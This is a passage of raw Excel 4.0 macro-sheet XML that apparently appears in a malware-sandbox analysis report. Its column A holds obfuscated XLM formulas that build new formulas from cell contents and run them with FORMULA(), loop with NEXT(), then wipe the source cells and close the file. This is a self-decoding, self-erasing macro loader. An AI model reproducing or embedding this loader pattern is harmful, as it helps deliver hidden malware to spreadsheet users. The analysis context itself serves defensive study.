s="2" t="s"><v>62</v></c><c r="AC57" s="2" t="s"><v>53</v></c></row><row r="58" spans="1:29" x14ac:dyDescent="0.25"><c r="A58" s="2" t="b"><f>DEFINE.NAME("e",e+1)</f><v>1</v></c><c r="B58" s="2" t="s"><v>41</v></c><c r="C58" s="2" t="s"><v>41</v></c><c r="AA58" s="2" t="s"><v>63</v></c><c r="AC58" s="2" t="s"><v>55</v></c></row><row r="59" spans="1:29" x14ac:dyDescent="0.25"><c r="A59" s="2" t="b"><f>NEXT()</f><v>1</v></c><c r="B59" s="2" t="s"><v>41</v></c><c r="C59" s="2" t="s"><v>41</v></c><c r="AA59" s="2" t="s"><v>48</v></c><c r="AC59" s="2" t="s"><v>52</v></c></row><row r="60" spans="1:29" x14ac:dyDescent="0.25"><c r="A60" s="2" t="b"><f>FORMULA("="&C40&""")",A65)</f><v>1</v></c><c r="B60" s="2" t="s"><v>41</v></c><c r="C60" s="2" t="s"><v>41</v></c><c r="AA60" s="2" t="s"><v>64</v></c><c r="AC60" s="2" t="s"><v>53</v></c></row><row r="61" spans="1:29" x14ac:dyDescent="0.25"><c r="B61" s="2" t="s"><v>41</v></c><c r="C61" s="2" t="s"><v>41</v></c><c r="AA61" s="2" t="s"><v>64</v></c><c r="AC61" s="2" t="s"><v>55</v></c></row><row r="62" spans="1:29" x14ac:dyDescent="0.25"><c r="B62" s="2" t="s"><v>41</v></c><c r="C62" s="2" t="s"><v>41</v></c><c r="AA62" s="2" t="s"><v>65</v></c><c r="AC62" s="2" t="s"><v>46</v></c></row><row r="63" spans="1:29" x14ac:dyDescent="0.25"><c r="B63" s="2" t="s"><v>41</v></c><c r="C63" s="2" t="s"><v>41</v></c><c r="AA63" s="2" t="s"><v>48</v></c><c r="AC63" s="2" t="s"><v>55</v></c></row><row r="64" spans="1:29" x14ac:dyDescent="0.25"><c r="B64" s="2" t="s"><v>41</v></c><c r="C64" s="2" t="s"><v>41</v></c><c r="AA64" s="2" t="s"><v>66</v></c><c r="AC64" s="2" t="s"><v>51</v></c></row><row r="65" spans="1:29" x14ac:dyDescent="0.25"><c r="A65" s="2" t="b"><f>DEFINE.NAME(t,1)</f><v>0</v></c><c r="B65" s="2" t="s"><v>41</v></c><c r="C65" s="2" t="s"><v>41</v></c><c r="AA65" s="2" t="s"><v>48</v></c><c r="AC65" s="2" t="s"><v>67</v></c></row><row r="66" spans="1:29" x14ac:dyDescent="0.25"><c r="B66" s="2" t="s"><v>41</v></c><c r="C66" s="2" t="s"><v>41</v></c><c r="AA66" s="2"><v>20</v></c><c r="AC66" s="2" t="s"><v>55</v></c></row><row r="67" spans="1:29" x14ac:dyDescent="0.25"><c r="A67" s="2" t="b"><f>SET.VALUE(B4:B100,"")</f><v>1</v></c><c r="B67" s="2" t="s"><v>41</v></c><c r="C67" s="2" t="s"><v>41</v></c><c r="AA67" s="2" t="s"><v>40</v></c><c r="AC67" s="2" t="s"><v>57</v></c></row><row r="68" spans="1:29" x14ac:dyDescent="0.25"><c r="A68" s="2" t="b"><f>SET.VALUE(C5:C101,"")</f><v>1</v></c><c r="B68" s="2" t="s"><v>41</v></c><c r="C68" s="2" t="s"><v>41</v></c><c r="AC68" s="2" t="s"><v>68</v></c></row><row r="69" spans="1:29" x14ac:dyDescent="0.25"><c r="A69" s="2" t="b"><f>FORMULA("=DEFINE.NAME(t,1)",A65)</f><v>1</v></c><c r="B69" s="2" t="s"><v>41</v></c><c r="C69" s="2" t="s"><v>41</v></c><c r="AC69" s="2" t="s"><v>55</v></c></row><row r="70" spans="1:29" x14ac:dyDescent="0.25"><c r="A70" s="2" t="b"><f>DEFINE.NAME("p",1)</f><v>1</v></c><c r="B70" s="2" t="s"><v>41</v></c><c r="C70" s="2" t="s"><v>41</v></c><c r="AC70" s="2" t="s"><v>69</v></c></row><row r="71" spans="1:29" x14ac:dyDescent="0.25"><c r="A71" s="2" t="b"><f>DEFINE.NAME("x",1)</f><v>1</v></c><c r="B71" s="2" t="s"><v>41</v></c><c r="C71" s="2" t="s"><v>41</v></c><c r="AC71" s="2" t="s"><v>49</v></c></row><row r="72" spans="1:29" x14ac:dyDescent="0.25"><c r="A72" s="2" t="b"><f>DEFINE.NAME("z",1)</f><v>1</v></c><c r="B72" s="2" t="s"><v>41</v></c><c r="C72" s="2" t="s"><v>41</v></c><c r="AC72" s="2" t="s"><v>51</v></c></row><row r="73" spans="1:29" x14ac:dyDescent="0.25"><c r="A73" s="2" t="b"><f>DEFINE.NAME("e",1)</f><v>1</v></c><c r="B73" s="2" t="s"><v>41</v></c><c r="C73" s="2" t="s"><v>41</v></c><c r="AC73" s="2" t="s"><v>64</v></c></row><row r="74" spans="1:29" x14ac:dyDescent="0.25"><c r="A74" s="2" t="b"><f>DEFINE.NAME("y",1)</f><v>1</v></c><c r="B74" s="2" t="s"><v>41</v></c><c r="C74" s="2" t="s"><v>41</v></c><c r="AC74" s="2" t="s"><v>55</v></c></row><row r="75" spans="1:29" x14ac:dyDescent="0.25"><c r="B75" s="2" t="s"><v>41</v></c><c r="C75" s="2" t="s"><v>41</v></c><c r="AC75" s="2" t="s"><v>70</v></c></row><row r="76" spans="1:29" x14ac:dyDescent="0.25"><c r="A76" s="2" t="b"><f>FILE.CLOSE(FALSE)</f><v>0</v></c><c r="B76" s="2" t="s"><v>41</v></c><c r="C76" s="2" t="s"><v>41</v></c><c r="AC76" s="2" t="s"><v>71</v></c></row><row r="77" spans="1:29" x14ac:dyDescent="0.25"><c r="B77" s="2" t="s"><v>41</v></c><c r="C77" s="2" t="s"><v>41</v></c><c r="AC77" s="2" t="s"><v>55</v></c></row><row r="78" spans="1:29" x14ac:dyDescent="0.25"><c r="B78" s="2" t="s"><v>41</v></c><c r="C78" s="2" t="s"><v>41</v></c><c r="AC78" s="2" t="s"><v>46</v></c></row><row r="79" spans="1:29" x14ac:dyDescent="0.25"><c r="B79" s="2" t="s"><v>41</v></c><c r="C79" s="2" t="s"><v>41</v></c><c r="AC79" s="2" t="s"><v>49</v></c></row><row r="80" spans="1:29" x14ac:dyDescent="0.25"><c r="B80" s="2" t="s"><v>41</v></c><c r="C80" s="2" t="s"><v>41</v></c><c r="AC80" s="2" t="s"><v>55</v></c></row><row r="81" spans="2:29" x14ac:dyDescent="0.25"><c r="B81" s="2" t="s"><v>41</v></c><c r="C81" s="2" t="s"><v>41</v></c><c r="AC81" s="2" t="s"><v>60</v></c></row><row r="82" spans="2:29" x14ac:dyDescent="0.25"><c r="B82" s="2" t="s"><v>41</v></c><c r="C82" s="2" t="s"><v>41</v></c><c r="AC82" s="2" t="s"><v>55</v></c></row><row r="83" spans="2:29" x14ac:dyDescent="0.25"><c r="B83" s="2" t="s"><v>41</v></c><c r="C83" s="2" t="s"><v>41</v></c><c r="AC83" s="2" t="s"><v>57</v></c></row><row r="84" spans="2:29" x14ac:dyDescent="0.25"><c r="B84" s="2" t="s"><v>41</v></c><c r="C84" s="2" t="s"><v>41</v></c><c r="AC84" s="2" t="s"><v>71</v></c></row><row r="85" spans="2:29" x14ac:dyDescent="0.25"><c r="B85" s="2" t="s"><v>41</v></c><c r="C85" s="2" t="s"><v>41</v></c><c r="AC85" s="2" t="s"><v>55</v></c></row><row r="86" spans="2:29" x14ac:dyDescent="0.25"><c r="B86" s="2" t="s"><v>41</v></c><c r="C86" s="2" t="s"><v>41</v></c><c r="AC86" s="2" t="s"><v>69</v></c></row><row r="87" spans="2:29" x14ac:dyDescent="0.25"><c r="B87" s="2" t="s"><v>41</v></c><c r="C87" s="2" t="s"><v>41</v></c><c r="AC87" s="2" t="s"><v>72</v></c></row><row r="88" spans="2:29" x14ac:dyDescent="0.25"><c r="B88" s="2" t="s"><v>41</v></c><c r="C88" s="2" t="s"><v>41</v></c><c r="AC88" s="2" t="s"><v>51</v></c></row><row r="89" spans="2:29" x14ac:dyDescent="0.25"><c r="B89" s="2" t="s"><v>41</v></c><c r="C89" s="2" t="s"><v>41</v></c><c r="AC89" s="2" t="s"><v>62</v></c></row><row r="90" spans="2:29" x14ac:dyDescent="0.25"><c r="B90" s="2" t="s"><v>41</v></c><c r="C90" s="2" t="s"><v>41</v></c><c r="AC90" s="2" t="s"><v>55</v></c></row><row r="91" spans="2:29" x14ac:dyDescent="0.25"><c r="B91" s="2" t="s"><v>41</v></c><c r="C91" s="2" t="s"><v>41</v></c><c r="AC91" s="2" t="s"><v>57</v></c></row><row r="92" spans="2:29" x14ac:dyDescent="0.25"><c r="B92" s="2" t="s"><v>41</v></c><c r="C92" s="2" t="s"><v>41</v></c><c r="AC92" s="2" t="s"><v>71</v></c></row><row r="93" spans="2:29" x14ac:dyDescent="0.25"><c r="B93" s="2" t="s"><v>41</v></c><c r="C93" s="2" t="s"><v>41</v></c><c r="AC93" s="2" t="s"><v>55</v></c></row><row r="94" spans="2:29" x14ac:dyDescent="0.25"><c r="B94" s="2" t="s"><v>41</v></c><c r="C94" s="2" t="s"><v>41</v></c><c r="AC94" s="2" t="s"><v>73</v></c></row><row r="95" spans="2:29" x14ac:dyDescent="0.25"><c r="B95" s="2" t="s"><v>41</v></c><c r="C95" s="2" t="s"><v>41</v></c><c r="AC95" s="2" t="s"><v>60</v></c></row><row r="96" spans="2:29" x14ac:dyDescent="0.25"><c r="B96" s="2" t="s"><v>41</v></c><c r="C96" s="2" t="s"><v>41</v></c><c r="AC96" s="2" t="s"><v>51</v></c></row><row r="97" spans="2:29" x14ac:dyDescent="0.25"><c r="B97" s="2" t="s"><v>41</v></c><c r="C97" s="2" t="s"><v>41</v></c><c r="AC97" s="2" t="s"><v>64</v></c></row><row r="98" spans="2:29" x14ac:dyDescent="0.25"><c r="B98" s="2" t="s"><v>41</v></c><c r="C98" s="2" t="s"><v>41</v></c><c r="AC98" s="2" t="s"><v>55</v></c></row><row r="99" spans="2:29" x14ac:dyDescent="0.25"><c r="B99" s="2" t="s"><v>41</v></c><c r="C99" s="2" t="s"><v>41</v></c><c r="AC99" s="2" t="s"><v>70</v></c></row><row r="100" spans="2:29" x14ac:dyDescent="0.25"><c r="B100" s="2" t="s"><v>41</v></c><c r="C100" s="2" t="s"><v>41</v></c><c r="AC100" s="2" t="s"><v>60</v></c></row><row r="101" spans="2:29" x14ac:dyDescent="0.25"><c r="B101" s="2"><v>0</v></c><c r="C101" s="2" t="s"><v>41</v></c><c r="AC101" s="2" t="s"><v>55</v></c></row><row r="102" spans="2:29" x14ac:dyDescent="0.25"><c r="AC102" s="2" t="s"><v>74</v></c></row><row r="103" spans="2:29" x14ac:dyDescent="0.25"><c r="AC103" s="2" t="s"><v>72</v></c></row><row r="104" spans="2:29" x14ac:dyDescent="0.25"><c r="AC104" s="2" t="s"><v>55</v></c></row><row r="105" spans="2:29" x14ac:dyDescent="0.25"><c r="AC105" s="2" t="s"><v>75</v></c></row><row r="106" spans="2:29" x14ac:dyDescent="0.25"><c r="AC106" s="2" t="s"><v>40</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup orientation="portrait" r:id="rId1"/></xm:macrosheet>
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.